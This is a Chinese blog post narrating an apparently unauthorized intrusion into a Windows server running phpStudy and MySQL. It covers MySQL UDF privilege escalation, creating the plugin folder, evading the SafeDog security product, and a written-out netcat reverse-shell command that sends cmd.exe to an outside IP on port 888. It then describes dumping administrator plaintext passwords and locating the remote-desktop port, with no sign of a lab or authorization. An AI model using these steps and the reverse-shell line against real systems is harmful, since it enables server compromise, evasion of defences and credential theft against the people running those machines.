记一次mysql提权

网站脚本:Asp,支持PHP

Mysql版本:5.5.36

Mysql路径:D:\phpStudy4IIS\MySQL

账户权限:root(经过测试未降权)


直接导出dll到:D:\phpStudy4IIS\MySQL\lib\plugin

报错:

[Err] 1 - Can't create/write to file 'D:\phpStudy4IIS\MySQL\lib\plugin\udf.dll' (Errcode: 2)


错误代码2,意思是文件夹不存在,访问这个路径看下,


D:\phpStudy4IIS\MySQL\lib\

里面没有 plugin 这个文件夹,新建文件夹试一下,有些时候有权限创建。

创建成功后导出dll,

然后注册函数,执行命令,

QQ图片20160601191522.png


不是系统权限,mysql又没降权,那么看来这个lujiang899_zhang 应该是管理员账户了,

执行net user没回显,查看进程发现看门狗,

QQ图片20160601191702.png


来个简单粗暴点的方法直接上远控,马子上去执行了没反应- -,看来还是狗咬住了,

上传nc和cmd到可写可执行目录,


新建bat内容如下:

QQ图片20160601191947.png


C:\wmpub\nc.exe -vv 203.111.88.98 888 -e C:\wmpub\cmd.exe


服务器监听888端口,

QQ图片20160601192220.png

然后回到mysql这里执行这个bat文件,

QQ图片20160601192318.png


运行后没反应,正常的,看下我们服务器的nc,可以看到shell已经弹过来了:

QQ图片20160601192452.png


现在上传抓管理员明文密码的工具,pass.jpg

QQ图片20160601192622.png


在nc弹过来的shell上执行,


QQ图片20160601192735.png


显示的有点多,往下翻找管理员的,


QQ图片20160601192925.png

找下远程端口进服务器Look下,

tasklit /svc:

QQ图片20160601193203.png


netstat -ano:

QQ图片20160601193315.png


端口:24578


QQ图片20160601193540.png


OK,Game Over。

Ps:安全狗就是一坨屎!辣鸡。

评论回复